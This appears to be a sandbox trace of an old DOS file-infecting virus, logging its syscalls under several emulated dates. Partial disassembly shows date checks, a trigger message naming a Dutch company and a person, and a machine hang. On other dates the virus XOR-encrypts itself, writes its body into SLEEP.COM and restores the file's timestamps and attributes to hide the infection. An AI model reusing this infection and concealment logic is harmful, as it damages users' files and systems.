{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":717,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:41:27.672609811Z | 42 | PC: 12a7e | Get date 0x12a7e: cmp dh, 8 0x12a81: jb 0x12a97 0x12a83: cmp dl, 0x16 0x12a86: jb 0x12a97 0x12a88: cmp al, 3 0x12a8a: jne 0x12a97 0x12a8c: mov ah, 9 0x12a8e: lea dx, word ptr [bp + 0x131] 0x12a92: int 0x21 0x12a94: cli 0x12a95: jmp 0x12a94 0x12a97: cmp dh, 5 0x12a9a: jae 0x12a9f 0x12a9c: jmp 0x12b4f 0x12a9f: mov ah, 0x1a 0x12aa1: mov dx, 0xfc00 0x12aa4: int 0x21 0x12aa6: mov ah, 0x4e 0x12aa8: lea dx, word ptr [bp + 0x12b] 0x12aac: xor cx, cx |
| 2018-12-25T11:41:27.67524961Z | 26 | PC: 12b56 | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":717,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:41:27.904379359Z | 42 | PC: 12a7e | Get date 0x12a7e: cmp dh, 8 0x12a81: jb 0x12a97 0x12a83: cmp dl, 0x16 0x12a86: jb 0x12a97 0x12a88: cmp al, 3 0x12a8a: jne 0x12a97 0x12a8c: mov ah, 9 0x12a8e: lea dx, word ptr [bp + 0x131] 0x12a92: int 0x21 0x12a94: cli 0x12a95: jmp 0x12a94 0x12a97: cmp dh, 5 0x12a9a: jae 0x12a9f 0x12a9c: jmp 0x12b4f 0x12a9f: mov ah, 0x1a 0x12aa1: mov dx, 0xfc00 0x12aa4: int 0x21 0x12aa6: mov ah, 0x4e 0x12aa8: lea dx, word ptr [bp + 0x12b] 0x12aac: xor cx, cx |
| 2018-12-25T11:41:27.906937598Z | 26 | PC: 12aa6 | Set disk transfer address |
| 2018-12-25T11:41:27.909176855Z | 78 | PC: 12ab0 | Find first file |
| 2018-12-25T11:41:27.916212327Z | 67 | PC: 12abd | Get or set file attributes |
| 2018-12-25T11:41:27.923767502Z | 67 | PC: 12ac5 | Get or set file attributes |
| 2018-12-25T11:41:27.942346458Z | 61 | PC: 12aca | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:41:27.950367685Z | 87 | PC: 12ad0 | Get or set file date and time |
| 2018-12-25T11:41:27.952441493Z | 63 | PC: 12add | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:41:27.960926603Z | 66 | PC: 12b03 | Move file pointer |
| 2018-12-25T11:41:27.962899142Z | 44 | PC: 12b16 | Get time 0x12b16: mov byte ptr cs:[bp + 0x17], dl 0x12b1a: lea si, word ptr [bp + 4] 0x12b1d: mov di, 0xfd00 0x12b20: mov cx, 0x17 0x12b23: rep movsb byte ptr es:[di], byte ptr [si] 0x12b25: lea si, word ptr [bp + 0x1b] 0x12b28: mov cx, 0x1e0 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, dl 0x12b2e: stosb byte ptr es:[di], al 0x12b2f: loop 0x12b2b 0x12b31: mov ah, 0x40 0x12b33: mov dx, 0xfd00 0x12b36: mov cx, 0x1f7 0x12b39: int 0x21 0x12b3b: mov ax, 0x4200 0x12b3e: call 0x22afd 0x12b41: mov ah, 0x40 0x12b43: lea dx, word ptr [bp + 0x128] 0x12b47: mov cx, 4 |
| 2018-12-25T11:41:27.965718285Z | 64 | PC: 12b3b | Write file or device (Write 503 bytes on handle 5) |
| 2018-12-25T11:41:27.97699221Z | 66 | PC: 12b03 | Move file pointer (See above) |
| 2018-12-25T11:41:27.978767794Z | 64 | PC: 12b4c | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:41:27.999507823Z | 87 | PC: 12b65 | Get or set file date and time |
| 2018-12-25T11:41:28.001582869Z | 62 | PC: 12b69 | Close file |
| 2018-12-25T11:41:28.011909376Z | 67 | PC: 12b72 | Get or set file attributes |
| 2018-12-25T11:41:28.031347121Z | 26 | PC: 12b56 | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":717,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:41:27.930273085Z | 42 | PC: 12a7e | Get date 0x12a7e: cmp dh, 8 0x12a81: jb 0x12a97 0x12a83: cmp dl, 0x16 0x12a86: jb 0x12a97 0x12a88: cmp al, 3 0x12a8a: jne 0x12a97 0x12a8c: mov ah, 9 0x12a8e: lea dx, word ptr [bp + 0x131] 0x12a92: int 0x21 0x12a94: cli 0x12a95: jmp 0x12a94 0x12a97: cmp dh, 5 0x12a9a: jae 0x12a9f 0x12a9c: jmp 0x12b4f 0x12a9f: mov ah, 0x1a 0x12aa1: mov dx, 0xfc00 0x12aa4: int 0x21 0x12aa6: mov ah, 0x4e 0x12aa8: lea dx, word ptr [bp + 0x12b] 0x12aac: xor cx, cx |
| 2018-12-25T11:41:27.933319857Z | 26 | PC: 12aa6 | Set disk transfer address |
| 2018-12-25T11:41:27.936154743Z | 78 | PC: 12ab0 | Find first file |
| 2018-12-25T11:41:27.943290732Z | 67 | PC: 12abd | Get or set file attributes |
| 2018-12-25T11:41:27.950485591Z | 67 | PC: 12ac5 | Get or set file attributes |
| 2018-12-25T11:41:27.972226683Z | 61 | PC: 12aca | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:41:27.979909359Z | 87 | PC: 12ad0 | Get or set file date and time |
| 2018-12-25T11:41:27.981699996Z | 63 | PC: 12add | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:41:27.989470744Z | 66 | PC: 12b03 | Move file pointer |
| 2018-12-25T11:41:27.991126343Z | 44 | PC: 12b16 | Get time 0x12b16: mov byte ptr cs:[bp + 0x17], dl 0x12b1a: lea si, word ptr [bp + 4] 0x12b1d: mov di, 0xfd00 0x12b20: mov cx, 0x17 0x12b23: rep movsb byte ptr es:[di], byte ptr [si] 0x12b25: lea si, word ptr [bp + 0x1b] 0x12b28: mov cx, 0x1e0 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, dl 0x12b2e: stosb byte ptr es:[di], al 0x12b2f: loop 0x12b2b 0x12b31: mov ah, 0x40 0x12b33: mov dx, 0xfd00 0x12b36: mov cx, 0x1f7 0x12b39: int 0x21 0x12b3b: mov ax, 0x4200 0x12b3e: call 0x22afd 0x12b41: mov ah, 0x40 0x12b43: lea dx, word ptr [bp + 0x128] 0x12b47: mov cx, 4 |
| 2018-12-25T11:41:27.993586096Z | 64 | PC: 12b3b | Write file or device (Write 503 bytes on handle 5) |
| 2018-12-25T11:41:28.002960696Z | 66 | PC: 12b03 | Move file pointer (See above) |
| 2018-12-25T11:41:28.005126233Z | 64 | PC: 12b4c | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:41:28.012722757Z | 87 | PC: 12b65 | Get or set file date and time |
| 2018-12-25T11:41:28.015030499Z | 62 | PC: 12b69 | Close file |
| 2018-12-25T11:41:28.024025963Z | 67 | PC: 12b72 | Get or set file attributes |
| 2018-12-25T11:41:28.036026903Z | 26 | PC: 12b56 | Set disk transfer address |
{"DateBased":true,"Day":22,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":717,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:41:28.027354992Z | 42 | PC: 12a7e | Get date 0x12a7e: cmp dh, 8 0x12a81: jb 0x12a97 0x12a83: cmp dl, 0x16 0x12a86: jb 0x12a97 0x12a88: cmp al, 3 0x12a8a: jne 0x12a97 0x12a8c: mov ah, 9 0x12a8e: lea dx, word ptr [bp + 0x131] 0x12a92: int 0x21 0x12a94: cli 0x12a95: jmp 0x12a94 0x12a97: cmp dh, 5 0x12a9a: jae 0x12a9f 0x12a9c: jmp 0x12b4f 0x12a9f: mov ah, 0x1a 0x12aa1: mov dx, 0xfc00 0x12aa4: int 0x21 0x12aa6: mov ah, 0x4e 0x12aa8: lea dx, word ptr [bp + 0x12b] 0x12aac: xor cx, cx |
| 2018-12-25T11:41:28.030752221Z | 26 | PC: 12aa6 | Set disk transfer address |
| 2018-12-25T11:41:28.031894842Z | 78 | PC: 12ab0 | Find first file |
| 2018-12-25T11:41:28.037688418Z | 67 | PC: 12abd | Get or set file attributes |
| 2018-12-25T11:41:28.043882972Z | 67 | PC: 12ac5 | Get or set file attributes |
| 2018-12-25T11:41:28.76450709Z | 61 | PC: 12aca | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:41:28.77720501Z | 87 | PC: 12ad0 | Get or set file date and time |
| 2018-12-25T11:41:28.779760539Z | 63 | PC: 12add | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:41:28.787058519Z | 66 | PC: 12b03 | Move file pointer |
| 2018-12-25T11:41:28.789488686Z | 44 | PC: 12b16 | Get time 0x12b16: mov byte ptr cs:[bp + 0x17], dl 0x12b1a: lea si, word ptr [bp + 4] 0x12b1d: mov di, 0xfd00 0x12b20: mov cx, 0x17 0x12b23: rep movsb byte ptr es:[di], byte ptr [si] 0x12b25: lea si, word ptr [bp + 0x1b] 0x12b28: mov cx, 0x1e0 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, dl 0x12b2e: stosb byte ptr es:[di], al 0x12b2f: loop 0x12b2b 0x12b31: mov ah, 0x40 0x12b33: mov dx, 0xfd00 0x12b36: mov cx, 0x1f7 0x12b39: int 0x21 0x12b3b: mov ax, 0x4200 0x12b3e: call 0x22afd 0x12b41: mov ah, 0x40 0x12b43: lea dx, word ptr [bp + 0x128] 0x12b47: mov cx, 4 |
| 2018-12-25T11:41:28.793172379Z | 64 | PC: 12b3b | Write file or device (Write 503 bytes on handle 5) |
| 2018-12-25T11:41:28.802107241Z | 66 | PC: 12b03 | Move file pointer (See above) |
| 2018-12-25T11:41:28.803962208Z | 64 | PC: 12b4c | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:41:28.810505826Z | 87 | PC: 12b65 | Get or set file date and time |
| 2018-12-25T11:41:28.813280065Z | 62 | PC: 12b69 | Close file |
| 2018-12-25T11:41:28.821359739Z | 67 | PC: 12b72 | Get or set file attributes |
| 2018-12-25T11:41:28.833138389Z | 26 | PC: 12b56 | Set disk transfer address |
{"DateBased":true,"Day":27,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":717,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:41:28.204770807Z | 42 | PC: 12a7e | Get date 0x12a7e: cmp dh, 8 0x12a81: jb 0x12a97 0x12a83: cmp dl, 0x16 0x12a86: jb 0x12a97 0x12a88: cmp al, 3 0x12a8a: jne 0x12a97 0x12a8c: mov ah, 9 0x12a8e: lea dx, word ptr [bp + 0x131] 0x12a92: int 0x21 0x12a94: cli 0x12a95: jmp 0x12a94 0x12a97: cmp dh, 5 0x12a9a: jae 0x12a9f 0x12a9c: jmp 0x12b4f 0x12a9f: mov ah, 0x1a 0x12aa1: mov dx, 0xfc00 0x12aa4: int 0x21 0x12aa6: mov ah, 0x4e 0x12aa8: lea dx, word ptr [bp + 0x12b] 0x12aac: xor cx, cx |
| 2018-12-25T11:41:28.207136735Z | 9 | PC: 12a94 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ') |